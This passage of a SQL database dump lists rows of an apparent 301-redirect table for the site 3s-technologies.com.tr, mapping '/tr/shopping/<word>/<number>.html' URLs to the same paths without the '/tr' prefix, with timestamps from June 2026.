00:00:00',301),(78077,'https://3s-technologies.com.tr/tr/shopping/hareld/4046939706.html',NULL,'https://3s-technologies.com.tr/shopping/hareld/4046939706.html','',1,0,'2026-06-11 10:47:26','0000-00-00 00:00:00',301),(78078,'https://3s-technologies.com.tr/tr/shopping/interventor/3370262910.html',NULL,'https://3s-technologies.com.tr/shopping/interventor/3370262910.html','',1,0,'2026-06-11 10:47:29','0000-00-00 00:00:00',301),(78079,'https://3s-technologies.com.tr/tr/shopping/excitable/2272922285.html',NULL,'https://3s-technologies.com.tr/shopping/excitable/2272922285.html','',1,0,'2026-06-11 10:47:32','0000-00-00 00:00:00',301),(78080,'https://3s-technologies.com.tr/tr/shopping/slopingly/1274492842.html',NULL,'https://3s-technologies.com.tr/shopping/slopingly/1274492842.html','',1,0,'2026-06-11 10:47:35','0000-00-00 00:00:00',301),(78081,'https://3s-technologies.com.tr/tr/shopping/expostulating/1997915886.html',NULL,'https://3s-technologies.com.tr/shopping/expostulating/1997915886.html','',1,0,'2026-06-11 10:47:39','0000-00-00 00:00:00',301),(78082,'https://3s-technologies.com.tr/tr/shopping/bringing/598311050.html',NULL,'https://3s-technologies.com.tr/shopping/bringing/598311050.html','',1,0,'2026-06-11 10:47:42','0000-00-00 00:00:00',301),(78083,'https://3s-technologies.com.tr/tr/shopping/bricky/1037168095.html',NULL,'https://3s-technologies.com.tr/shopping/bricky/1037168095.html','',1,0,'2026-06-11 10:47:45','0000-00-00 00:00:00',301),(78084,'https://3s-technologies.com.tr/tr/shopping/fixure/1106360916.html',NULL,'https://3s-technologies.com.tr/shopping/fixure/1106360916.html','',1,0,'2026-06-11 10:47:48','0000-00-00 00:00:00',301),(78085,'https://3s-technologies.com.tr/tr/shopping/cussed/1037004572.html',NULL,'https://3s-technologies.com.tr/shopping/cussed/1037004572.html','',1,0,'2026-06-11 10:47:51','0000-00-00 00:00:00',301),(78086,'https://3s-technologies.com.tr/tr/shopping/lastingly/2087384781.html',NULL,'https://3s-technologies.com.tr/shopping/lastingly/2087384781.html','',1,0,'2026-06-11 10:47:54','0000-00-00 00:00:00',301),(78087,'https://3s-technologies.com.tr/tr/shopping/bousy/747459650.html',NULL,'https://3s-technologies.com.tr/shopping/bousy/747459650.html','',1,0,'2026-06-11 10:47:57','0000-00-00 00:00:00',301),(78088,'https://3s-technologies.com.tr/tr/shopping/clothchez/1136827578.html',NULL,'https://3s-technologies.com.tr/shopping/clothchez/1136827578.html','',1,0,'2026-06-11 10:48:00','0000-00-00 00:00:00',301),(78089,'https://3s-technologies.com.tr/tr/shopping/scenographically/2583323991.html',NULL,'https://3s-technologies.com.tr/shopping/scenographically/2583323991.html','',1,0,'2026-06-11 10:48:03','0000-00-00 00:00:00',301),(78090,'https://3s-technologies.com.tr/tr/shopping/echoless/2844216059.html',NULL,'https://3s-technologies.com.tr/shopping/echoless/2844216059.html','',1,0,'2026-06-11 10:48:06','0000-00-00 00:00:00',301),(78091,'https://3s-technologies.com.tr/tr/shopping/overflush/3134531637.html',NULL,'https://3s-technologies.com.tr/shopping/overflush/3134531637.html','',1,0,'2026-06-11 10:48:09','0000-00-00 00:00:00',301),(78092,'https://3s-technologies.com.tr/tr/shopping/ischiadic/694847141.html',NULL,'https://3s-technologies.com.tr/shopping/ischiadic/694847141.html','',1,0,'2026-06-11 10:48:12','0000-00-00 00:00:00',301),(78093,'https://3s-technologies.com.tr/tr/shopping/zooidal/2997330169.html',NULL,'https://3s-technologies.com.tr/shopping/zooidal/2997330169.html','',1,0,'2026-06-11 10:48:15','0000-00-00 00:00:00',301),(78094,'https://3s-technologies.com.tr/tr/shopping/beans/4026829740.html',NULL,'https://3s-technologies.com.tr/shopping/beans/4026829740.html','',1,0,'2026-06-11 10:48:19','0000-00-00 00:00:00',301),(78095,'https://3s-technologies.com.tr/tr/shopping/limehound/3203078342.html',NULL,'https://3s-technologies.com.tr/shopping/limehound/3203078342.html','',1,0,'2026-06-11 10:48:21','0000-00-00 00:00:00',301),(78096,'https://3s-technologies.com.tr/tr/shopping/polos/983950652.html',NULL,'https://3s-technologies.com.tr/shopping/polos/983950652.html','',1,0,'2026-06-11 10:48:24','0000-00-00 00:00:00',301),(78097,'https://3s-technologies.com.tr/tr/shopping/cactuses/1289396774.html',NULL,'https://3s-technologies.com.tr/shopping/cactuses/1289396774.html','',1,0,'2026-06-11 10:48:27','0000-00-00 00:00:00',301),(78098,'https://3s-technologies.com.tr/tr/shopping/intercoming/1218685479.html',NULL,'https://3s-technologies.com.tr/shopping/intercoming/1218685479.html','',1,0,'2026-06-11 10:48:30','0000-00-00 00:00:00',301),(78099,'https://3s-technologies.com.tr/tr/shopping/coregonus/147801484.html',NULL,'https://3s-technologies.com.tr/shopping/coregonus/147801484.html','',1,0,'2026-06-11 10:48:33','0000-00-00 00:00:00',301),(78100,'https://3s-technologies.com.tr/tr/shopping/feudalizing/778488241.html',NULL,'https://3s-technologies.com.tr/shopping/feudalizing/778488241.html','',1,0,'2026-06-11 10:48:36','0000-00-00 00:00:00',301),(78101,'https://3s-technologies.com.tr/tr/shopping/grumblingly/1121291788.html',NULL,'https://3s-technologies.com.tr/shopping/grumblingly/1121291788.html','',1,0,'2026-06-11 10:48:39','0000-00-00 00:00:00',301),(78102,'https://3s-technologies.com.tr/tr/shopping/deplore/1166734698.html',NULL,'https://3s-technologies.com.tr/shopping/deplore/1166734698.html','',1,0,'2026-06-11 10:48:42','0000-00-00 00:00:00',301),(78103,'https://3s-technologies.com.tr/tr/shopping/natatorious/744600951.html',NULL,'https://3s-technologies.com.tr/shopping/natatorious/744600951.html','',1,0,'2026-06-11 10:48:45','0000-00-00 00:00:00',301),(78104,'https://3s-technologies.com.tr/tr/shopping/desilverization/2520422524.html',NULL,'https://3s-technologies.com.tr/shopping/desilverization/2520422524.html','',1,0,'2026-06-11 10:48:48','0000-00-00 00:00:00',301),(78105,'https://3s-technologies.com.tr/tr/shopping/modiolus/2361329376.html',NULL,'https://3s-technologies.com.tr/shopping/modiolus/2361329376.html','',1,0,'2026-06-11 10:48:51','0000-00-00 00:00:00',301),(78106,'https://3s-technologies.com.tr/tr/shopping/hatted/1013857772.html',NULL,'https://3s-technologies.com.tr/shopping/hatted/1013857772.html','',1,0,'2026-06-11 10:48:54','0000-00-00 00:00:00',301),(78107,'https://3s-technologies.com.tr/tr/shopping/subaud/1349692256.html',NULL,'https://3s-technologies.com.tr/shopping/subaud/1349692256.html','',1,0,'2026-06-11 10:48:57','0000-00-00 00:00:00',301),(78108,'https://3s-technologies.com.tr/tr/shopping/brusque/4195316133.html',NULL,'https://3s-technologies.com.tr/shopping/brusque/4195316133.html','',1,0,'2026-06-11 10:49:00','0000-00-00 00:00:00',301),(78109,'https://3s-technologies.com.tr/tr/shopping/indebted/2850180453.html',NULL,'https://3s-technologies.com.tr/shopping/indebted/2850180453.html','',1,0,'2026-06-11 10:49:03','0000-00-00 00:00:00',301),(78110,'https://3s-technologies.com.tr/tr/shopping/functionalist/811924031.html',NULL,'https://3s-technologies.com.tr/shopping/functionalist/811924031.html','',1,0,'2026-06-11 10:49:06','0000-00-00 00:00:00',301),(78111,'https://3s-technologies.com.tr/tr/shopping/recognisable/854155974.html',NULL,'https://3s-technologies.com.tr/shopping/recognisable/854155974.html','',1,0,'2026-06-11 10:49:09','0000-00-00 00:00:00',301),(78112,'https://3s-technologies.com.tr/tr/shopping/prolonger/3320107608.html',NULL,'https://3s-technologies.com.tr/shopping/prolonger/3320107608.html','',1,0,'2026-06-11 10:49:15','0000-00-00 00:00:00',301),(78113,'https://3s-technologies.com.tr/tr/shopping/transitory/1628165104.html',NULL,'https://3s-technologies.com.tr/shopping/transitory/1628165104.html','',1,0,'2026-06-11 10:49:17','0000-00-00 00:00:00',301),(78114,'https://3s-technologies.com.tr/tr/shopping/pimples/2495890961.html',NULL,'https://3s-technologies.com.tr/shopping/pimples/2495890961.html','',1,0,'2026-06-11 10:49:19','0000-00-00 00:00:00',301),(78115,'https://3s-technologies.com.tr/tr/shopping/pridefully/1083819055.html',NULL,'https://3s-technologies.com.tr/shopping/pridefully/1083819055.html','',1,0,'2026-06-11 10:49:23','0000-00-00 00:00:00',301),(78116,'https://3s-technologies.com.tr/tr/shopping/fomenter/895214316.html',NULL,'https://3s-technologies.com.tr/shopping/fomenter/895214316.html','',1,0,'2026-06-11 10:49:29','0000-00-00 00:00:00',301),(78117,'https://3s-technologies.com.tr/tr/shopping/tettering/3107087197.html',NULL,'https://3s-technologies.com.tr/shopping/tettering/3107087197.html','',1,0,'2026-06-11 10:49:33','0000-00-00 00:00:00',301),(78118,'https://3s-technologies.com.tr/tr/shopping/coenogenesis/449483969.html',NULL,'https://3s-technologies.com.tr/shopping/coenogenesis/449483969.html','',1,0,'2026-06-11 10:49:36','0000-00-00 00:00:00',301),(78119,'https://3s-technologies.com.tr/tr/shopping/tempera/1111950689.html',NULL,'https://3s-technologies.com.tr/shopping/tempera/1111950689.html','',1,0,'2026-06-11 10:49:39','0000-00-00 00:00:00',301),(78120,'https://3s-technologies.com.tr/tr/shopping/cushioning/493280295.html',NULL,'https://3s-technologies.com.tr/shopping/cushioning/493280295.html','',1,0,'2026-06-11 10:49:42','0000-00-00 00:00:00',301),(78121,'https://3s-technologies.com.tr/tr/shopping/multiramose/3318732002.html',NULL,'https://3s-technologies.com.tr/shopping/multiramose/3318732002.html','',1,0,'2026-06-11 10:49:45','0000-00-00 00:00:00',301),(78122,'https://3s-technologies.com.tr/tr/shopping/taintlessly/156309692.html',NULL,'https://3s-technologies.com.tr/shopping/taintlessly/156309692.html','',1,0,'2026-06-11 10:49:48','0000-00-00 00:00:00',301),(78123,'https://3s-technologies.com.tr/tr/shopping/embark/3353352951.html',NULL,'https://3s-technologies.com.tr/shopping/embark/3353352951.html','',1,0,'2026-06-11 10:49:51','0000-00-00 00:00:00',301),(78124,'https://3s-technologies.com.tr/tr/shopping/rostra/3574740449.html',NULL,'https://3s-technologies.com.tr/shopping/rostra/3574740449.html','',1,0,'2026-06-11 10:49:54','0000-00-00 00:00:00',301),(78125,'https://3s-technologies.com.tr/tr/shopping/eucarya/247777455.html',NULL,'https://3s-technologies.com.tr/shopping/eucarya/247777455.html','',1,0,'2026-06-11 10:49:57','0000-00-00 00:00:00',301),(78126,'https://3s-technologies.com.tr/tr/shopping/trekometer/3105711559.html',NULL,'https://3s-technologies.com.tr/shopping/trekometer/3105711559.html','',1,0,'2026-06-11 10:50:00','0000-00-00 00:00:00',301),(78127,'https://3s-technologies.com.tr/tr/shopping/sprit/121877488.html',NULL,'https://3s-technologies.com.tr/shopping/sprit/121877488.html','',1,0,'2026-06-11 10:50:03','0000-00-00 00:00:00',301),(78128,'https://3s-technologies.com.tr/tr/shopping/ablebodied/1759551073.html',NULL,'https://3s-technologies.com.tr/shopping/ablebodied/1759551073.html','',1,0,'2026-06-11 10:50:06','0000-00-00 00:00:00',301),(78129,'https://3s-technologies.com.tr/tr/shopping/bitting/1398323094.html',NULL,'https://3s-technologies.com.tr/shopping/bitting/1398323094.html','',1,0,'2026-06-11 10:50:09','0000-00-00 00:00:00',301),(78130,'https://3s-technologies.com.tr/tr/shopping/reasonableness/817724902.html',NULL,'https://3s-technologies.com.tr/shopping/reasonableness/817724902.html','',1,0,'2026-06-11 10:50:12','0000-00-00 00:00:00',301),(78131,'https://3s-technologies.com.tr/tr/shopping/considered/2066235348.html',NULL,'https://3s-technologies.com.tr/shopping/considered/2066235348.html','',1,0,'2026-06-11 10:50:17','0000-00-00 00:00:00',301),(78132,'https://3s-technologies.com.tr/tr/shopping/acceptability/1771750839.html',NULL,'https://3s-technologies.com.tr/shopping/acceptability/1771750839.html','',1,0,'2026-06-11 10:50:19','0000-00-00 00:00:00',301),(78133,'https://3s-technologies.com.tr/tr/shopping/enthymeme/3763373822.html',NULL,'https://3s-technologies.com.tr/shopping/enthymeme/3763373822.html','',1,0,'2026-06-11 10:50:22','0000-00-00 00:00:00',301),(78134,'https://3s-technologies.com.tr/tr/shopping/firetail/1248403854.html',NULL,'https://3s-technologies.com.tr/shopping/firetail/1248403854.html','',1,0,'2026-06-11 10:50:27','0000-00-00 00:00:00',301),(78135,'https://3s-technologies.com.tr/tr/shopping/rooftree/2685159876.html',NULL,'https://3s-technologies.com.tr/shopping/rooftree/2685159876.html','',1,0,'2026-06-11 10:50:29','0000-00-00 00:00:00',301),(78136,'https://3s-technologies.com.tr/tr/shopping/solely/2381401808.html',NULL,'https://3s-technologies.com.tr/shopping/solely/2381401808.html','',1,0,'2026-06-11 10:50:32','0000-00-00 00:00:00',301),(78137,'https://3s-technologies.com.tr/tr/shopping/retirade/4132961065.html',NULL,'https://3s-technologies.com.tr/shopping/retirade/4132961065.html','',1,0,'2026-06-11 10:50:35','0000-00-00 00:00:00',301),(78138,'https://3s-technologies.com.tr/tr/shopping/metropolis/250201637.html',NULL,'https://3s-technologies.com.tr/shopping/metropolis/250201637.html','',1,0,'2026-06-11 10:50:38','0000-00-00 00:00:00',301),(78139,'https://3s-technologies.com.tr/tr/shopping/eruptional/2157804312.html',NULL,'https://3s-technologies.com.tr/shopping/eruptional/2157804312.html','',1,0,'2026-06-11 10:50:41','0000-00-00 00:00:00',301),(78140,'https://3s-technologies.com.tr/tr/shopping/nucleobranch/3786342471.html',NULL,'https://3s-technologies.com.tr/shopping/nucleobranch/3786342471.html','',1,0,'2026-06-11 10:50:44','0000-00-00 00:00:00',301),(78141,'https://3s-technologies.com.tr/tr/shopping/vauntingly/1839819152.html',NULL,'https://3s-technologies.com.tr/shopping/vauntingly/1839819152.html','',1,0,'2026-06-11 10:50:47','0000-00-00 00:00:00',301),(78142,'https://3s-technologies.com.tr/tr/shopping/deficiently/1019836778.html',NULL,'https://3s-technologies.com.tr/shopping/deficiently/1019836778.html','',1,0,'2026-06-11 10:50:50','0000-00-00 00:00:00',301),(78143,'https://3s-technologies.com.tr/tr/shopping/tallying/2764379379.html',NULL,'https://3s-technologies.com.tr/shopping/tallying/2764379379.html','',1,0,'2026-06-11 10:50:53','0000-00-00 00:00:00',301),(78144,'https://3s-technologies.com.tr/tr/shopping/funebrious/1631172682.html',NULL,'https://3s-technologies.com.tr/shopping/funebrious/1631172682.html','',1,0,'2026-06-11 10:50:56','0000-00-00 00:00:00',301),(78145,'https://3s-technologies.com.tr/tr/shopping/hippobosca/3886253068.html',NULL,'https://3s-technologies.com.tr/shopping/hippobosca/3886253068.html','',1,0,'2026-06-11 10:50:59','0000-00-00 00:00:00',301),(78146,'https://3s-technologies.com.tr/tr/shopping/baptism/1056253238.html',NULL,'https://3s-technologies.com.tr/shopping/baptism/1056253238.html','',1,0,'2026-06-11 10:51:02','0000-00-00 00:00:00',301),(78147,'https://3s-technologies.com.tr/tr/shopping/slasher/3172567773.html',NULL,'https://3s-technologies.com.tr/shopping/slasher/3172567773.html','',1,0,'2026-06-11 10:51:05','0000-00-00 00:00:00',301),(78148,'https://3s-technologies.com.tr/tr/shopping/philhellenism/2314900093.html',NULL,'https://3s-technologies.com.tr/shopping/philhellenism/2314900093.html','',1,0,'2026-06-11 10:51:09','0000-00-00 00:00:00',301),(78149,'https://3s-technologies.com.tr/tr/shopping/ictinus/2945379404.html',NULL,'https://3s-technologies.com.tr/shopping/ictinus/2945379404.html','',1,0,'2026-06-11 10:51:17','0000-00-00 00:00:00',301),(78150,'https://3s-technologies.com.tr/tr/shopping/mesocolon/635927313.html',NULL,'https://3s-technologies.com.tr/shopping/mesocolon/635927313.html','',1,0,'2026-06-11 10:51:20','0000-00-00 00:00:00',301),(78151,'https://3s-technologies.com.tr/tr/shopping/arterialization/2356524887.html',NULL,'https://3s-technologies.com.tr/shopping/arterialization/2356524887.html','',1,0,'2026-06-11 10:51:23','0000-00-00 00:00:00',301),(78152,'https://3s-technologies.com.tr/tr/shopping/conduit/1039946760.html',NULL,'https://3s-technologies.com.tr/shopping/conduit/1039946760.html','',1,0,'2026-06-11 10:51:26','0000-00-00 00:00:00',301),(78153,'https://3s-technologies.com.tr/tr/shopping/clench/2875146501.html',NULL,'https://3s-technologies.com.tr/shopping/clench/2875146501.html','',1,0,'2026-06-11 10:51:29','0000-00-00 00:00:00',301),(78154,'https://3s-technologies.com.tr/tr/shopping/reclose/4048749813.html',NULL,'https://3s-technologies.com.tr/shopping/reclose/4048749813.html','',1,0,'2026-06-11 10:51:32','0000-00-00 00:00:00',301),(78155,'https://3s-technologies.com.tr/tr/shopping/padurus/2388787044.html',NULL,'https://3s-technologies.com.tr/shopping/padurus/2388787044.html','',1,0,'2026-06-11 10:51:35','0000-00-00 00:00:00',301),(78156,'https://3s-technologies.com.tr/tr/shopping/congeed/36108795.html',NULL,'https://3s-technologies.com.tr/shopping/congeed/36108795.html','',1,0,'2026-06-11 10:51:38','0000-00-00 00:00:00',301),(78157,'https://3s-technologies.com.tr/tr/shopping/prospectus/3065876874.html',NULL,'https://3s-technologies.com.tr/shopping/prospectus/3065876874.html','',1,0,'2026-06-11 10:51:41','0000-00-00 00:00:00',301),(78158,'https://3s-technologies.com.tr/tr/shopping/inaccuracy/738636557.html',NULL,'https://3s-technologies.com.tr/shopping/inaccuracy/738636557.html','',1,0,'2026-06-11 10:51:44','0000-00-00 00:00:00',301),(78159,'https://3s-technologies.com.tr/tr/shopping/babish/356078843.html',NULL,'https://3s-technologies.com.tr/shopping/babish/356078843.html','',1,0,'2026-06-11 10:51:49','0000-00-00 00:00:00',301),(78160,'https://3s-technologies.com.tr/tr/shopping/entada/470567996.html',NULL,'https://3s-technologies.com.tr/shopping/entada/470567996.html','',1,0,'2026-06-11 10:51:51','0000-00-00 00:00:00',301),(78161,'https://3s-technologies.com.tr/tr/shopping/preace/567380608.html',NULL,'https://3s-technologies.com.tr/shopping/preace/567380608.html','',1,0,'2026-06-11 10:51:54','0000-00-00 00:00:00',301),(78162,'https://3s-technologies.com.tr/tr/shopping/crayer/4169203392.html',NULL,'https://3s-technologies.com.tr/shopping/crayer/4169203392.html','',1,0,'2026-06-11 10:51:57','0000-00-00 00:00:00',301),(78163,'https://3s-technologies.com.tr/tr/shopping/couveuse/1452297997.html',NULL,'https://3s-technologies.com.tr/shopping/couveuse/1452297997.html','',1,0,'2026-06-11 10:52:02','0000-00-00 00:00:00',301),(78164,'https://3s-technologies.com.tr/tr/shopping/obconic/3974864347.html',NULL,'https://3s-technologies.com.tr/shopping/obconic/3974864347.html','',1,0,'2026-06-11 10:52:04','0000-00-00 00:00:00',301),(78165,'https://3s-technologies.com.tr/tr/shopping/beluga/325653701.html',NULL,'https://3s-technologies.com.tr/shopping/beluga/325653701.html','',1,0,'2026-06-11 10:52:07','0000-00-00 00:00:00',301),(78166,'https://3s-technologies.com.tr/tr/shopping/shaster/4129584376.html',NULL,'https://3s-technologies.com.tr/shopping/shaster/4129584376.html','',1,0,'2026-06-11 10:52:10','0000-00-00 00:00:00',301),(78167,'https://3s-technologies.com.tr/tr/shopping/thermic/1417242531.html',NULL,'https://3s-technologies.com.tr/shopping/thermic/1417242531.html','',1,0,'2026-06-11 10:52:13','0000-00-00 00:00:00',301),(78168,'https://3s-technologies.com.tr/tr/shopping/ranella/3771554968.html',NULL,'https://3s-technologies.com.tr/shopping/ranella/3771554968.html','',1,0,'2026-06-11 10:52:16','0000-00-00 00:00:00',301),(78169,'https://3s-technologies.com.tr/tr/shopping/firemen/2511412155.html',NULL,'https://3s-technologies.com.tr/shopping/firemen/2511412155.html','',1,0,'2026-06-11 10:52:19','0000-00-00 00:00:00',301),(78170,'https://3s-technologies.com.tr/tr/shopping/downhearted/226284165.html',NULL,'https://3s-technologies.com.tr/shopping/downhearted/226284165.html','',1,0,'2026-06-11 10:52:22','0000-00-00 00:00:00',301),(78171,'https://3s-technologies.com.tr/tr/shopping/foolhardise/2203792168.html',NULL,'https://3s-technologies.com.tr/shopping/foolhardise/2203792168.html','',1,0,'2026-06-11 10:52:25','0000-00-00 00:00:00',301),(78172,'https://3s-technologies.com.tr/tr/shopping/excommunication/3015290189.html',NULL,'https://3s-technologies.com.tr/shopping/excommunication/3015290189.html','',1,0,'2026-06-11 10:52:28','0000-00-00 00:00:00',301),(78173,'https://3s-technologies.com.tr/tr/shopping/prideless/127678359.html',NULL,'https://3s-technologies.com.tr/shopping/prideless/127678359.html','',1,0,'2026-06-11 10:52:31','0000-00-00 00:00:00',301),(78174,'https://3s-technologies.com.tr/tr/shopping/artly/298099948.html',NULL,'https://3s-technologies.com.tr/shopping/artly/298099948.html','',1,0,'2026-06-11 10:52:34','0000-00-00 00:00:00',301),(78175,'https://3s-technologies.com.tr/tr/shopping/circlet/4281927830.html',NULL,'https://3s-technologies.com.tr/shopping/circlet/4281927830.html','',1,0,'2026-06-11 10:52:37','0000-00-00 00:00:00',301),(78176,'https://3s-technologies.com.tr/tr/shopping/semipalmated/417601020.html',NULL,'https://3s-technologies.com.tr/shopping/semipalmated/417601020.html','',1,0,'2026-06-11 10:52:40','0000-00-00 00:00:00',301),(78177,'https://3s-technologies.com.tr/tr/shopping/oxylebius/3312496614.html',NULL,'https://3s-technologies.com.tr/shopping/oxylebius/3312496614.html','',1,0,'2026-06-11 10:52:43','0000-00-00 00:00:00',301),(78178,'https://3s-technologies.com.tr/tr/shopping/ureide/1190217685.html',NULL,'https://3s-technologies.com.tr/shopping/ureide/1190217685.html','',1,0,'2026-06-11 10:52:46','0000-00-00 00:00:00',301),(78179,'https://3s-technologies.com.tr/tr/shopping/straik/2167524635.html',NULL,'https://3s-technologies.com.tr/shopping/straik/2167524635.html','',1,0,'2026-06-11 10:52:49','0000-00-00 00:00:00',301),(78180,'https://3s-technologies.com.tr/tr/shopping/windflower/2904359528.html',NULL,'https://3s-technologies.com.tr/shopping/windflower/2904359528.html','',1,0,'2026-06-11 10:52:52','0000-00-00 00:00:00',301),(78181,'https://3s-technologies.com.tr/tr/shopping/thane/3652616695.html',NULL,'https://3s-technologies.com.tr/shopping/thane/3652616695.html','',1,0,'2026-06-11 10:52:55','0000-00-00 00:00:00',301),(78182,'https://3s-technologies.com.tr/tr/shopping/psittaculus/2510036517.html',NULL,'https://3s-technologies.com.tr/shopping/psittaculus/2510036517.html','',1,0,'2026-06-11 10:52:58','0000-00-00 00:00:00',301),(78183,'https://3s-technologies.com.tr/tr/shopping/phosphorbronze/3581753435.html',NULL,'https://3s-technologies.com.tr/shopping/phosphorbronze/3581753435.html','',1,0,'2026-06-11 10:53:01','0000-00-00 00:00:00',301),(78184,'https://3s-technologies.com.tr/tr/shopping/nosle/3231849343.html',NULL,'https://3s-technologies.com.tr/shopping/nosle/3231849343.html','',1,0,'2026-06-11 10:53:09','0000-00-00 00:00:00',301),(78185,'https://3s-technologies.com.tr/tr/shopping/slabbier/2039539211.html',NULL,'https://3s-technologies.com.tr/shopping/slabbier/2039539211.html','',1,0,'2026-06-11 10:53:13','0000-00-00 00:00:00',301),(78186,'https://3s-technologies.com.tr/tr/shopping/candlelight/322631495.html',NULL,'https://3s-technologies.com.tr/shopping/candlelight/322631495.html','',1,0,'2026-06-11 10:53:16','0000-00-00 00:00:00',301),(78187,'https://3s-technologies.com.tr/tr/shopping/perfusion/1598840548.html',NULL,'https://3s-technologies.com.tr/shopping/perfusion/1598840548.html','',1,0,'2026-06-11 10:53:19','0000-00-00 00:00:00',301),(78188,'https://3s-technologies.com.tr/tr/shopping/acrocephaly/680701585.html',NULL,'https://3s-technologies.com.tr/shopping/acrocephaly/680701585.html','',1,0,'2026-06-11 10:53:22','0000-00-00 00:00:00',301),(78189,'https://3s-technologies.com.tr/tr/shopping/carpodacus/1922073072.html',NULL,'https://3s-technologies.com.tr/shopping/carpodacus/1922073072.html','',1,0,'2026-06-11 10:53:24','0000-00-00 00:00:00',301),(78190,'https://3s-technologies.com.tr/tr/shopping/citrination/1521200855.html',NULL,'https://3s-technologies.com.tr/shopping/citrination/1521200855.html','',1,0,'2026-06-11 10:53:28','0000-00-00 00:00:00',301),(78191,'https://3s-technologies.com.tr/tr/shopping/logodaedaly/561295256.html',NULL,'https://3s-technologies.com.tr/shopping/logodaedaly/561295256.html','',1,0,'2026-06-11 10:53:31','0000-00-00 00:00:00',301),(78192,'https://3s-technologies.com.tr/tr/shopping/malapert/4231186353.html',NULL,'https://3s-technologies.com.tr/shopping/malapert/4231186353.html','',1,0,'2026-06-11 10:53:34','0000-00-00 00:00:00',301),(78193,'https://3s-technologies.com.tr/tr/shopping/funnelform/1871282212.html',NULL,'https://3s-technologies.com.tr/shopping/funnelform/1871282212.html','',1,0,'2026-06-11 10:53:42','0000-00-00 00:00:00',301),(78194,'https://3s-technologies.com.tr/tr/shopping/allay/2916302976.html',NULL,'https://3s-technologies.com.tr/shopping/allay/2916302976.html','',1,0,'2026-06-11 10:53:46','0000-00-00 00:00:00',301),(78195,'https://3s-technologies.com.tr/tr/shopping/snivelling/3353516474.html',NULL,'https://3s-technologies.com.tr/shopping/snivelling/3353516474.html','',1,0,'2026-06-11 10:53:49','0000-00-00 00:00:00',301),(78196,'https://3s-technologies.com.tr/tr/shopping/leased/1199395277.html',NULL,'https://3s-technologies.com.tr/shopping/leased/1199395277.html','',1,0,'2026-06-11 10:53:52','0000-00-00 00:00:00',301),(78197,'https://3s-technologies.com.tr/tr/shopping/chancroid/3184347682.html',NULL,'https://3s-technologies.com.tr/shopping/chancroid/3184347682.html','',1,0,'2026-06-11 10:53:55','0000-00-00 00:00:00',301),(78198,'https://3s-technologies.com.tr/tr/shopping/misbecoming/2523799213.html',NULL,'https://3s-technologies.com.tr/shopping/misbecoming/2523799213.html','',1,0,'2026-06-11 10:53:58','0000-00-00 00:00:00',301),(78199,'https://3s-technologies.com.tr/tr/shopping/cucquean/2068615623.html',NULL,'https://3s-technologies.com.tr/shopping/cucquean/2068615623.html','',1,0,'2026-06-11 10:54:01','0000-00-00 00:00:00',301),(78200,'https://3s-technologies.com.tr/tr/shopping/dismaying/683545640.html',NULL,'https://3s-technologies.com.tr/shopping/dismaying/683545640.html','',1,0,'2026-06-11 10:54:06','0000-00-00 00:00:00',301),(78201,'https://3s-technologies.com.tr/tr/shopping/episcia/3419627455.html',NULL,'https://3s-technologies.com.tr/shopping/episcia/3419627455.html','',1,0,'2026-06-11 10:54:11','0000-00-00 00:00:00',301),(78202,'https://3s-technologies.com.tr/tr/shopping/gauntly/651441565.html',NULL,'https://3s-technologies.com.tr/shopping/gauntly/651441565.html','',1,0,'2026-06-11 10:54:14','0000-00-00 00:00:00',301),(78203,'https://3s-technologies.com.tr/tr/shopping/enstate/4034426106.html',NULL,'https://3s-technologies.com.tr/shopping/enstate/4034426106.html','',1,0,'2026-06-11 10:54:17','0000-00-00 00:00:00',301),(78204,'https://3s-technologies.com.tr/tr/shopping/enlarge/1707600276.html',NULL,'https://3s-technologies.com.tr/shopping/enlarge/1707600276.html','',1,0,'2026-06-11 10:54:20','0000-00-00 00:00:00',301),(78205,'https://3s-technologies.com.tr/tr/shopping/pailmail/3718954887.html',NULL,'https://3s-technologies.com.tr/shopping/pailmail/3718954887.html','',1,0,'2026-06-11 10:54:22','0000-00-00 00:00:00',301),(78206,'https://3s-technologies.com.tr/tr/shopping/chaetognathan/2905735166.html',NULL,'https://3s-technologies.com.tr/shopping/chaetognathan/2905735166.html','',1,0,'2026-06-11 10:54:26','0000-00-00 00:00:00',301),(78207,'https://3s-technologies.com.tr/tr/shopping/reconvert/2076390156.html',NULL,'https://3s-technologies.com.tr/shopping/reconvert/2076390156.html','',1,0,'2026-06-11 10:54:29','0000-00-00 00:00:00',301),(78208,'https://3s-technologies.com.tr/tr/shopping/suppling/3169191084.html',NULL,'https://3s-technologies.com.tr/shopping/suppling/3169191084.html','',1,0,'2026-06-11 10:54:32','0000-00-00 00:00:00',301),(78209,'https://3s-technologies.com.tr/tr/shopping/alkargen/3793662349.html',NULL,'https://3s-technologies.com.tr/shopping/alkargen/3793662349.html','',1,0,'2026-06-11 10:54:35','0000-00-00 00:00:00',301),(78210,'https://3s-technologies.com.tr/tr/shopping/penitence/2472000413.html',NULL,'https://3s-technologies.com.tr/shopping/penitence/2472000413.html','',1,0,'2026-06-11 10:54:38','0000-00-00 00:00:00',301),(78211,'https://3s-technologies.com.tr/tr/shopping/coaxed/15213513.html',NULL,'https://3s-technologies.com.tr/shopping/coaxed/15213513.html','',1,0,'2026-06-11 10:54:41','0000-00-00 00:00:00',301),(78212,'https://3s-technologies.com.tr/tr/shopping/vulva/2489911923.html',NULL,'https://3s-technologies.com.tr/shopping/vulva/2489911923.html','',1,0,'2026-06-11 10:54:48','0000-00-00 00:00:00',301),(78213,'https://3s-technologies.com.tr/tr/shopping/chartulary/2140702556.html',NULL,'https://3s-technologies.com.tr/shopping/chartulary/2140702556.html','',1,0,'2026-06-11 10:54:51','0000-00-00 00:00:00',301),(78214,'https://3s-technologies.com.tr/tr/shopping/icequake/2855021907.html',NULL,'https://3s-technologies.com.tr/shopping/icequake/2855021907.html','',1,0,'2026-06-11 10:54:54','0000-00-00 00:00:00',301),(78215,'https://3s-technologies.com.tr/tr/shopping/cantatory/1071625537.html',NULL,'https://3s-technologies.com.tr/shopping/cantatory/1071625537.html','',1,0,'2026-06-11 10:54:57','0000-00-00 00:00:00',301),(78216,'https://3s-technologies.com.tr/tr/shopping/glama/3342214989.html',NULL,'https://3s-technologies.com.tr/shopping/glama/3342214989.html','',1,0,'2026-06-11 10:55:00','0000-00-00 00:00:00',301),(78217,'https://3s-technologies.com.tr/tr/shopping/closest/1480180995.html',NULL,'https://3s-technologies.com.tr/shopping/closest/1480180995.html','',1,0,'2026-06-11 10:55:03','0000-00-00 